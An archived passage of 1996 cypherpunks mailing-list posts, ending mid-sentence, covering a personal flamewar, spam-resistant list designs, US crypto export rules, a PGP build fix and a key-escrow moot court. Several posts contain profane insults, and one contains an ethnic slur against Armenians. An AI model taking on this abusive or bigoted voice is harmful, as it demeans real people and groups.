In-Reply-To: <199612310620.WAA20583@adnetsol.adnetsol.com>
Message-ID: <199612310745.BAA03060@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


gentlemen, why don't you relax: 

1) I bet that if Ross slapped Tim, he would not shoot Ross
2) I bet that Ross will not slap Tim, regardless of 1)
3) It is often easy to make a judgment about people, and hard for
   other people to change others' judgment
4) it follows from 3) that flamewars are useless

Ross Wright wrote:
> 
> On or About 30 Dec 96 at 21:32, Timothy C. May wrote:
> 
> > 
> > Indeed, I added "Ross Wright" to my Eudora filter file after his
> > "slap you around" message several days ago, so I was mercifully
> > spared from reading
> > 
> > 
> > As to why he got *plonked*, this is the price people pay for writing
> > such things as "maybe we need to slap him around." I have more than
> > 20 in my
> > 
> > Oh, and posting private mail is not considered acceptable behavior.
> > 
> 
> What's next?  If Timmy doesn't like what I write will I be kicked off 
> like the Doctor?  Wow!  From Timmy's trash bin to Kook of the Month 
> FAME!!!!!  What more could I ask for?  Fuck You, Too, Timmy!  But I 
> refuse to censor my own input, so I'll still have to see your fucking 
> stuff.  ShitHead.  Hostile Agent!
> 
> How come it took over a year to get this far?  
> 
> Ross (Proud to be in Timmy's Filter File) Wright
> 
> =-=-=-=-=-=-
> Ross Wright
> King Media: Bulk Sales of Software Media and Duplication Services
> http://www.slip.net/~cdr/kingmedia
> Voice: 415-206-9906
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 31 Dec 1996 00:40:00 -0800 (PST)
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Hardening lists against spam attacks
In-Reply-To: <v03007803aeee6643cfe0@[206.217.121.121]>
Message-ID: <199612310833.CAA03527@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Bill Frantz wrote:
> 
> (3) In order to limit the number of posting tokens, the list server will
> only issue a few per day.  The lucky few who get them, everyone who asks
> under normal circumstances, may be determined by an algorithm designed to
> limit token collection by future attackers.  (This area is where this
> proposal needs work!)
> 

Send a number of unique tokens to each subscriber each day.  Enforce a
rule that only posts with valid current tokens may be accepted. The
number of tokens should initially be very small (say, one per day) and
then should be quickly increased to a sufficient number, like 10 or 20,
as the subscriber shows a record of using tokens properly (as defined by
acceptable content rules).

A database is kept as to who was issued which tokens.

If tokens are used improperly (to post off-topic materials) the 
offending subscriber is denied any further tokens.

The problem of this scheme is (besides its cost) that anonymous users
will not be truly anonymous.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@berserk.com>
Date: Mon, 30 Dec 1996 17:39:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: CAVE
Message-ID: <199612310244.DAA03138@asylum.berserk.com>
MIME-Version: 1.0
Content-Type: text/plain



CAVE is available at URL:
http://www.replay.com/mirror/cave/

Enjoy,
-AJ-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Tue, 31 Dec 1996 02:40:23 -0800 (PST)
To: Ross Wright <rwright@adnetsol.com>
Subject: Re: (Fwd) Re: Mr. May's Posts.  Other Things.
In-Reply-To: <199612310337.TAA17118@adnetsol.adnetsol.com>
Message-ID: <32C9047D.45EE@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Ross Wright wrote:
>  But a private threat of gunplay, that you have no right to!

 "People have a right to do to you anything that you can't
stop them from doing."
  Harry Browne, 'How I Found Freedom in an Unfree World.'






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Tue, 31 Dec 1996 02:38:54 -0800 (PST)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: (Fwd) Re: Mr. May's Posts. Other Things.
In-Reply-To: <Pine.SUN.3.91.961230194801.17467A-100000@crl2.crl.com>
Message-ID: <32C90630.4C4D@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort wrote:
 
> So let me see if I've got this right.  Threatening to slap
> someone is okay, but threatening to defend one's self from such
> an attack is not okay?  Interesting.  I guess the old saying
> still applies, "the essence of humor is WHOSE ox is being gored."

  Ha, ha--ouch!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Tue, 31 Dec 1996 03:53:04 -0800 (PST)
To: jim bell <jimbell@pacifier.com>
Subject: Re: "Structuring" of Communications a Felony?
In-Reply-To: <199612310645.WAA12065@mail.pacifier.com>
Message-ID: <32C90C18.6944@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


jim bell wrote:
>  In fact, the feds
> could simply start a sham "investigation," perhaps assisted by a phony
> message sent by a confederate through the remailer, and then declare that
> their investigation had been "thwarted."

  Thank heaven that our government would never do anything like this.
(and that Santa Clause is real)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Tue, 31 Dec 1996 03:49:35 -0800 (PST)
To: user@domain.com
Subject: Re: [[[   NEW !  Computer Based Business.    ]]]
In-Reply-To: <19961231062532.AAA13772@Compaq>
Message-ID: <32C90D53.1907@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


93865@net.122 wrote: 
> DO NOT PRESS REPLY. Send all inquiries, and remove request to
> http://business.atcon.com/parker/PSM/Tony/tonypsm.htm

  This is, by far, the politest spam I have yet received.
  But Fuck Off, anyway.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Tue, 31 Dec 1996 03:51:19 -0800 (PST)
To: Bill Frantz <frantz@netcom.com>
Subject: Re: Hardening lists against spam attacks
In-Reply-To: <v03007803aeee6643cfe0@[206.217.121.121]>
Message-ID: <32C91A54.2FCE@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


This is the first posting I have seen (someone unSCUMscribed me a
few days ago) which addresses the need for having defences in
place against spamming attacks.

  The fact is, the InterNet is a global neighborhood, and everyone
will be affected by the security or non-security of their neighbors.
Since the Web is currently seen as the new 'gold rush', every Tom,
Dick and Harry who wants to capitalize on it will be putting up
web sites, with their concern being focused much more on increasing 
their piece of the pie, than on being good neighbors.
  So sports lists are going to make it easy-as-pie for 10,000 Laker's
fans named Bubba to subscribe to their list and, as a result, make it
also as easy-as-pie for people to take advantage of their come-one-
come-all policy in order to engage in the sport of spamming. 

  While there are many good list operators who take reasonable
precautions against abuse of their system, they are often still
left open to abuse coming from the system of less concerned
list operators.
  It would seem to me that part of the solution would be to have
in place a monitoring system which would reflect a sudden increase
in email coming in from new (or current) sources.  Then the source
of any excessive increase could be put on 'hold' until the system
operator has a chance to check on the validity of the reason behind
the sudden increase.
  (20 messages from Bubba is an inconvenience, but 500 messages
is a royal pain-in-the-ass)

  As for 'mailbots', I think that any solutions to the potential
abuse will only be a 'stopping action', at best.
  My view is that the machines are starting to make their play
towards taking over, and that we will eventually be doomed to be
their slaves, and not the other way around.
 
Toto
Bill Frantz wrote:
> 
> The Christmas attack against this list shows the need to develop lists
> which are resistant to attacks.  If cyberspace is to become the town square
> of the next century, we need to be able to discourage brown shirts attacks
> on political gatherings.  If lists are to be a major part of the political
> life of the community, then they must be resistant to attacks from
> knowledgeable, well financed attackers, not just the shits who were the
> most recent perps.
> 
> There are several principles which should be observed:
> 
> (1) Since attacks are based on sending to the list, receiving the list
> should remain substantially unchanged.
> 
> (2) Spam attacks should be throttled at the source, so they do not act as a
> denial of service attack on the list server.
> 
> Here is a sketch of a protocol which attempts to achieve these goals:
> 
> (1) All messages sent to the list must be encrypted with the list's public
> key.  This requirement is primarily to protect the posting token (see
> below).  However, it alone will probably reduce the problem.  Certainly it
> will eliminate the effectiveness of the "subscribe the list to some other
> list" attacks.
> 
> (2) In order to post to the list, the poster must have a valid posting
> token.  These tokens are available, in limited number, anonymously.  Tokens
> remain valid unless canceled for abuse.  However, if too many posts are
> received with a given token, TCP performance on sockets using that token
> may become arbitrarily slow (or the circuit may be dropped).
> 
> (3) In order to limit the number of posting tokens, the list server will
> only issue a few per day.  The lucky few who get them, everyone who asks
> under normal circumstances, may be determined by an algorithm designed to
> limit token collection by future attackers.  (This area is where this
> proposal needs work!)
> 
> -------------------------------------------------------------------------> Bill Frantz       | Client in California, POP3 | Periwinkle -- Consulting
> (408)356-8506     | in Pittsburgh, Packets in  | 16345 Englewood Ave.
> frantz@netcom.com | Pakistan. - me             | Los Gatos, CA 95032, USA





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Mon, 30 Dec 1996 21:28:05 -0800 (PST)
To: cypherpunks@toad.com
Subject: premail.
Message-ID: <199612310527.GAA12868@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


A scenario:

1) The spooks put a bug (named Eve) on the link between
kiwi.cs.berkeley.edu and the Internet.

   Whenever kiwi.cs.berkeley.edu sents out the pubring.pgp Eve intercepts
it and replaces it with a file of the spooks' choosing. This file will
selectively replace the public pgp keys of some of the remailers (say exon)
in pubring.pgp with keys to which the spooks know the private key.

2) A similar bug is put on the link between the exon remailer and the
internet. All email to exon is intercepted, and if found to be encrypted
with the spooks' PGP key, it is decrypted, saved, re-encrypted with exon's
real PGP key and sent on.

It is only a scenario. I am still using premail to send this.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Tue, 31 Dec 1996 03:59:45 -0800 (PST)
To: cypherpunks@toad.com
Subject: Constitutionality of new regs.
Message-ID: <9612311143.AA08693@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


	One issue which I haven't seen anybody address is the
provision to make export licenses easier to obtain for those
companies which show a credible business plan that supports GAK.

	1) Isn't this showing favouritism in an administrative
decision to people who support the government's political agenda.

	2) If the export of a certain encryption `item' is inimical to
`National Security', isn't the harm to the `National Security' the same
regardless of whether the exporter plans to produce GAK products in the future
or not?

	Based on these two points shouldn't this aspect of the regulations
considered as being `arbitrary' and hence unconstitutional.

	A further thought. If you obtain an export license by showing
the government a business plan that supports GAK, but then do not
follow your business plan, how will the goverment `get' you?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Tue, 31 Dec 1996 05:06:57 -0800 (PST)
To: "Attila T. Hun" <attila@primenet.com>
Subject: Re: Just another government fuckover: New crypto regulations
In-Reply-To: <199612310700.XAA06518@infowest.com>
Message-ID: <32C9288C.22E9@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Attila T. Hun wrote:
> 
>     Russia never had a communist government, it was a dictatorship
>     somewhat tempered by the power of the apparati (which under Stalin
>     was a joke); it just so happened they practiced the art of the
>     commune in collective farming --except they stole the bulk of the
>     communes' production.  Any concept of the commune ownership was
>     fantasy.

  In Canada, farmers purportedly own their own land, but are required by
law to sell their grain only through the (collective) Canadian Wheat
Board.
  Right now, farmers are fighting this policy, and being jailed for 
attempting to sell their grain themselves, on the open market. 
  
  Why is it that governments always seem to be so self-congratulatory
about allowing the citizens to be 'free' to do those things that the
government 'allows' them to do?
  It is so comforting to know that I am 'free' to decide what color of
sand they put in the Vaseline. (I prefer black, myself)

Toto






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 31 Dec 1996 07:10:05 -0800 (PST)
To: ichudov@algebra.com
Subject: Re: Hardening lists against spam attacks
In-Reply-To: <199612310833.CAA03527@manifold.algebra.com>
Message-ID: <Pine.SUN.3.91.961231065434.8933C-100000@crl13.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Tue, 31 Dec 1996 ichudov@algebra.com wrote:

> Send a number of unique tokens to each subscriber each day...
> ...
> A database is kept as to who was issued which tokens.
> 
> If tokens are used improperly (to post off-topic materials) the 
> offending subscriber is denied any further tokens.
> 
> The problem of this scheme is (besides its cost) that anonymous users
> will not be truly anonymous.

There is a simple solution to keeping anonymous posters anonymous
under this or any similar scheme.  Volunteers could act as
"gateways" for anonymous posts.  Self-selected list members could
announce that they would forward anonymous posts using one of
their own tokens for the purpose.  (In the alternative, the
gateway volunteers could be given extra tokens solely for that
purpose.)

The gateway volunteers would be a firewall against flames and
spam attacks, but would be a conduit for substantive anonymous
posts.  If gateway volunteers allowed inappropriate flames and 
spams through, they would have *their* tokens reduced.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Tue, 31 Dec 1996 05:06:57 -0800 (PST)
To: "Attila T. Hun" <attila@primenet.com>
Subject: Re: Just another government fuckover: New crypto regulations
In-Reply-To: <199612310700.XAA06518@infowest.com>
Message-ID: <32C92C74.7CC@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Attila T. Hun wrote:

> ::If you are a "cypher punk", you are not for freedom.
> 
>         No, no, no, dimitri.  Cypherpunks are absolute in their demands
>     for freedom.  Most are making the choice to demand freedom while
>     they play in the band and the Titanic sinks.

   One also needs to keep in mind that, contrary to the great gun-packing
debate going on in the conference, not everyone is so quick to vocalize
whether or not they are 'packing'.
   It's similar to asking your opponent in a poker-game what he's 'holding'
when it's showdown time. Would you really trust his or her answer, no 
matter what it was?
  To me, the only real answer, in either situation, is a 'shrug'.
You've got to pay to play.

  I don't know if fuck@yourself.up had any problems as a result of his
escapade, but if he did, I would suspect there is a good chance that
they were caused by one of the more soft-spoken people on the forum.
  I've bounced a lot of wild-frontier bars in my time, and it has
been my experience that it is a truism that,
  "The quiet ones are the guys you don't want to mess with."

Toto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Tue, 31 Dec 1996 05:29:49 -0800 (PST)
To: Igor Chudov <ichudov@algebra.com>
Subject: Re: Hardening lists against spam attacks
In-Reply-To: <199612310833.CAA03527@manifold.algebra.com>
Message-ID: <32C92E6B.F02@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Igor Chudov @ home wrote:
 
> If tokens are used improperly (to post off-topic materials) the
> offending subscriber is denied any further tokens.

  I'm sure that the NSA would be more than happy to take responsibility
for deciding which posts are off-topic.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Tue, 31 Dec 1996 05:28:08 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: If He Doesn't Like Me
In-Reply-To: <199612310620.WAA20583@adnetsol.adnetsol.com>
Message-ID: <32C92F84.1E32@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> 
> Your message is the equivalent of that brain-damaged ebonite's "Why can't
> we all just get along?"

Tim,
  Have you 'coined a phrase' here?
  Perhaps future generations, reading of the exploits of the 'Ebonites', 
will recognize your contribution to the language.

Toto






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 31 Dec 1996 05:17:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Shell  Game News
Message-ID: <1.5.4.32.19961231131318.0069d390@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Online reports on the new crypto regs. MSNBC features 
Bernstein's challenge, with multiple sidebars.

http://www.msnbc.com/news/49260.asp

http://usatoday.com/news/washdc/ncs20.htm  (AP brief)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 31 Dec 1996 07:00:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: (Fwd) Re: Mr. May's Posts.  Other Things.
In-Reply-To: <199612310312.TAA16542@adnetsol.adnetsol.com>
Message-ID: <qo1sZD40w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Ross Wright" <rwright@adnetsol.com> writes:
>
> I gotta have a cuppa coffe, and calm down!
>

Have some Turkish coffee - fuck the Armenians.

Happy New Year,

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 31 Dec 1996 06:23:21 -0800 (PST)
To: Marshall Clow <cypherpunks@toad.com
Subject: Re: LAW_dno
In-Reply-To: <v03100c0baeee6907d4b2@[207.67.246.99]>
Message-ID: <v0300784eaeeeccee3dec@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:56 am -0500 12/31/96, Marshall Clow wrote:
>In the 12-29-96. Computerworld:
>>>>>
> Karen Epper, an analyst at Forrester Research, Inc. in Cambridge, Mass.,
> said electronic commerce companies should do more legal research than
> that.
>
> "Joe Programmer could create a new currency system," Epper said. "But if
> it's not supported by regulators, what do you have?"
><<<<
>
>And there you have it.
>If it's not regulated by the government, it's no good.
>
>P.S	This was not an isolated quote, this was the central point of the article.

Fortunately, such "points" are about to go the way of the devine right of
kings, the unquestioned authority of the church, and, of course, rendering
unto Ceasar. ;-).

See you all in Anguilla...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com), Philodox,
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/
FC97: Anguilla, anyone? http://offshore.com.ai/fc97/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Tue, 31 Dec 1996 09:33:40 -0800 (PST)
To: mrwilhe <mrwilhe@odin.cmp.ilstu.edu>
Subject: Re: what is a law if it cant be enforced?
Message-ID: <199612311732.JAA27497@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


As long as it can be selectivley enforced, that's
all they need.

    Ryan

---------- Previous Message ----------
To: cypherpunks
cc: 
From: mrwilhe @ odin.cmp.ilstu.edu @ smtp
Date: 12/30/96 07:43:01 PM
Subject: what is a law if it cant be enforced?

can our gov possibly enforce this crypto law? --esp over the net?
I think what happend is the dod released the net (arpanet/Internet) to the
people without looking at the implications that could arise.  The people now
control the net and not the gov--and they don't like it!
anyway our government is ruled by the people for the people--so we should
not have any kind of special laws--ones that only apply to the net and not
the rest of the world, after all we have a thing called free speech!
fsh








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 31 Dec 1996 09:31:59 -0800 (PST)
To: Bill Frantz <frantz@netcom.com>
Subject: Re: Hardening lists against spam attacks
In-Reply-To: <v03007803aeee6643cfe0@[206.217.121.121]>
Message-ID: <32C94D58.3CBB@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Bill Frantz wrote:
> The Christmas attack against this list shows the need to develop lists
> which are resistant to attacks.  If cyberspace is to become the town square
> of the next century, we need to be able to discourage brown shirts attacks
> on political gatherings.  If lists are to be a major part of the political
> life of the community, then they must be resistant to attacks from
> knowledgeable, well financed attackers, not just the shits who were the
> most recent perps.

[snip]

> All messages sent to the list must be encrypted with the list's public key.

So in order to post here, I hafta install and run PGP?  Well, people
were looking for the perfect formula to deny service to guys like me,
and guess what?  You found it!  I will *not* install and run PGP.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Tue, 31 Dec 1996 09:30:18 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: RE: Just another government fuckover: New crypto regulations
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-961231172957Z-65478@INET-02-IMC.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From:	Toto

 Why is it that governments always seem to be so self-congratulatory
about allowing the citizens to be 'free' to do those things that the
government 'allows' them to do?
.....................................................


Not to start a thread specifically on government bashing, but Toto'
statement is so on-target about the kind of attitude which emanates from
what regulators say and do.  It is their underlying assumption that only
they have the moral discernment to determine the parameters of
propriety; which makes them think that no 'underling' has the right of
self-determination.

It can be seen in statements they make such as as:  "there are no
provisions in Super Legislation Bill 200A.666.b.32xy.450z for individual
exemptions from voluntary contribution".   
(well, excuse Me! <g>)

So this means that an individual can feel "free" to act only when these
people feel magnanimously generous enough to allow it.  No reference to
Reason or Logic in the way things work in Reality, only that an action
is inhibited or allowed "because this piece of paper says so".
Therefore from their perspective and their re-definition of "person",
Human Motivation derives its validity solely from their "provisions" for
it.   All other determining factors are Prohibited by Law.  

How can you argue with that? 

   ..
Blanc
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 31 Dec 1996 06:46:47 -0800 (PST)
To: markm@voicenet.com (Mark M.)
Subject: Re: Building PGP on Freebsd?
In-Reply-To: <Pine.LNX.3.95.961230234115.2038B-100000@eclipse.voicenet.com>
Message-ID: <199612311443.JAA08589@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


Thanks!  Commenting out USEMPILIB worked fine.

We now return you to your regularly scheduled flammage.

Adam


Mark M. wrote:
-- Start of PGP signed section.
| On Mon, 30 Dec 1996, Adam Shostack wrote:
| 
| > I get this message at the end, for building with the netbsd or the
| > 386bsd config file.  I know theres a simple tweak, can someone remind
| > me what it is?
| >
| > Thanks,
| >
| > Adam
| >
| >
| >
| > gcc -o pgp pgp.o crypto.o keymgmt.o fileio.o  mdfile.o more.o armor.o
| > mpilib.o mpiio.o  genprime.o rsagen.o random.o idea.o passwd.o  md5.o
| > system.o language.o getopt.o keyadd.o  config.o keymaint.o charset.o
| > randpool.o noise.o zbits.o zdeflate.o zfile_io.o zglobals.o
| > zinflate.o zip.o zipup.o ztrees.o zunzip.o rsaglue2.o _80386.o
| > _zmatch.o   ../rsaref/install/unix/rsaref.a
| > rsaglue2.o: Definition of symbol `_NN_ModExp' (multiply defined)
| 
| You can either comment out the function "NN_ModExp" in the file nn.c in rsaref
| or not define "USEMPILIB".
| 
| 
| Mark
-- End of PGP signed section.


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Bostick <abostick@netcom.com>
Date: Tue, 31 Dec 1996 09:43:37 -0800 (PST)
To: ichudov@algebra.com
Subject: Re: Hardening lists against spam attacks
In-Reply-To: <199612310833.CAA03527@manifold.algebra.com>
Message-ID: <Pine.3.89.9612310958.A19648-0100000@netcom16>
MIME-Version: 1.0
Content-Type: text/plain





On Tue, 31 Dec 1996 ichudov@algebra.com wrote:

> Send a number of unique tokens to each subscriber each day.  Enforce a
> rule that only posts with valid current tokens may be accepted. The
> number of tokens should initially be very small (say, one per day) and
> then should be quickly increased to a sufficient number, like 10 or 20,
> as the subscriber shows a record of using tokens properly (as defined by
> acceptable content rules).
> 
> A database is kept as to who was issued which tokens.
> 
> If tokens are used improperly (to post off-topic materials) the 
> offending subscriber is denied any further tokens.
> 
> The problem of this scheme is (besides its cost) that anonymous users
> will not be truly anonymous.

This scheme wouldn't necessarily map True Names to tokens; merely
list subscriptions.  If an account at a nymserver were to subscribe,
there would be no way to identify the account holder.

The real problem is that there could be a lot of subscriptions
from a site like  nymserver.bwalk.com . . . .

Alan Bostick               | I'm not cheating; I'm *winning*!
mailto:abostick@netcom.com |      Emma Michael Notkin
news:alt.grelb             | 
http://www.alumni.caltech.edu/~abostick





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 31 Dec 1996 09:46:33 -0800 (PST)
To: Gemini Thunder <gt@kdn0.attnet.or.jp>
Subject: Re: New crypto regulations
In-Reply-To: <32cc13c3.83442324@kdn0.attnet.or.jp>
Message-ID: <32C95126.1CA9@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Gemini Thunder wrote:
> gt@kdn0.attnet.or.jp (Gemini Thunder) wrote:
> >Has magnetic media never been tested in court for freedom of press
> >applicability?  What are the laws that outline the differences between
> >magnetic media and printed media?  Specifically, the one(s) that
> >permit the non-protection of magnetic media?[snippo]
> Also, what qualifies as "encryption" here?  Basic implementation of
> an algorithm?  Full-blown programs? Hash functions?  Steganography
>  (with/without additional encryption)?  Data after a CTRL-Z?  (Sorry,
> couldn't help it)

Actually, on MS-DOS computers (UNIX too?), the data following end-of-
file is real enough, even when the file header *doesn't* recognize it.

Paste a few of these together, and presto-stego, there you are.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 31 Dec 1996 09:56:42 -0800 (PST)
To: Igor Chudov <ichudov@algebra.com>
Subject: Re: Hardening lists against spam attacks
In-Reply-To: <199612310833.CAA03527@manifold.algebra.com>
Message-ID: <32C95389.287B@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Igor Chudov @ home wrote:
> Bill Frantz wrote:
> > (3) In order to limit the number of posting tokens, the list server will
> > only issue a few per day.  The lucky few who get them, everyone who asks
> > under normal circumstances, may be determined by an algorithm designed to
> > limit token collection by future attackers.  (This area is where this
> > proposal needs work!)[snip]
> Send a number of unique tokens to each subscriber each day.  Enforce a
> rule that only posts with valid current tokens may be accepted. The
> number of tokens should initially be very small (say, one per day) and
> then should be quickly increased to a sufficient number, like 10 or 20,
> as the subscriber shows a record of using tokens properly (as defined by
> acceptable content rules).[snip]

Why not have any list deal with a heirarchy of security, so that:

n-number of posters will use the highest level of security
m-number will use a lower level of security
k-number will send plain text

Flags can be assigned for various purposes:

What level of encoding I send my messages with
What level I can receive
Restrictions on delivery of my messages according to a table maintained
  by the list managers





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Abelson <hal@htp.hpl.hp.com>
Date: Tue, 31 Dec 1996 10:11:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: constitutionlity of mandatory GAK
Message-ID: <m0vf8e4-000FyRC@htp.hpl.hp.com>
MIME-Version: 1.0
Content-Type: text/plain




Given the current discussion of possibile GAK legislation, you may
want to check out the session from last March's Computers, Freedom,
and Privacy Conference on outlawing non-escrowed encryption.

We invented a manadatory GAK law "Cryptography Control Act of 1995"
and debated its constitutionality in a mock "Supreme Court" hearing
before a panel of real fedreral judges.  The briefs and the oral
arguments (available on the Web in RealAudio format) are an excellent
source on questions of whether mandatory GAK would be constitutional.

The text of the web page is attached below.  The actual page has links
an extensive set of documents.

By the way, watch for the announcement for CFP97, which will be held
March 11-14 in Burlingame, CA.

-- Hal Abelson

		    ******************************

Text from the Web page:

      http://swissnet.ai.mit.edu/~switz/cfp96/plenary-court.html



CFP96 Plenary Session

Before the Court: Can the US Government Criminalize Unauthorized Encryption?

Presented on Thursday, March 28, 1:30-3:30 PM

   * Report on the session from the CFP96 Newsletter
   * Recording of the oral arguments (in RealAudio format)

 Advocates for the Government: Mark Rasch
                               Mark Jackowski
 Advocates for the Defense:    Andrew Good
                               Phil Dubois
 Federal Judges:               Hon. Sandra Lynch
                               Hon. Susan Bucklew
                               Hon. William Castagna
                               Hon. Nancy Gertner
                               Hon. William C. Young
 Shadow Panel:                 Judith McMorrow
                               Charles Nesson
                               Maureen O'Rourke
 Majority Opinion:             Michael Froomkin
 Dissenting Opinion:           Christine Axsmith
 Bench memo:                   Alyssa Harvey
 Brief writers (appellant):    Jeffrey Hermes
                               Chris Kelly
 Brief writers (respondent):   Bob Kluge
                               Dan Zelenko
                               Scott Faga
 Organizer:                    Andrew Grosso

Looming over the controversies surrounding the Digital Telephony
Legislation, the Clipper Chip proposal, and the criminal investigation of
PGP, is the shadow of perhaps the most critical issue of them all:

     Will Americans be prohibited from ensuring the privacy of their
     communications, including preserving those communications against
     government intrusion? Will strong, non-escrowed encryption be
     outlawed, and those who use it subjected to criminal prosecution?

CFP96, in co-sponsorship with the American Bar Association, Criminal Justice
Section, presented a moot Court highlighting this question. The format was
that of a Supreme Court argument, where former federal prosecutors argued
against noted civil liberties lawyers before a panel of five federal judges.
A second panel, comprised of regional law school professors, served as a
shadow court and rendered a written judgment on the case.

The issue being tested was whether an individual, who has successfully used
outlawed encryption to hide his conversations while the target of a criminal
investigation, can be prosecuted and convicted for use of unauthorized
encryption under the (fictional) "Cryptography Control Act of 1995".

The background for this session assumed that the defendant's conviction was
upheld 2-1 in an appeals court decision, whose majority opinion and
dissenting opinion set forth the central Constitutonal arguments for
upholding, or overturning, the prohibition of unauthorized encryption. At
the CFP session, the Court reviewed the decision and the shadow court
overturned it, rendering a majority opinion and a concurring opinion.

Documents available

The appeals decision

   * Overview
   * Opinion for the Court filed by Circuit Judge Mitchell.
   * Concurring statement filed by Circuit Judge Froomkin.
   * Dissent filed by Circuit Judge Axsmith.

The review before the Court

   * Brief for the Appellant
   * Brief for the Respondent
   * Bench memo
   * Recording of the oral arguments (in RealAudio format)
   * Majority Opinion by Justices McMorrow and O'Rourke
   * Concurring Opinion by Justice Nesson

Session participants

Arguing on behalf of the government were former federal prosecutor Mark
Rasch, and Mark Jackowski, Assistant US Attorney from Tampa, Florida. Mr.
Rasch is a former Trial Attorney with the Department of Justice Fraud
Section, in Washington, D.C, where he prosecuted the Robert T. Morris case.
Mr. Rasch (Mark_Rasch@cpqm.saic.com) is currently Legal Counsel for the
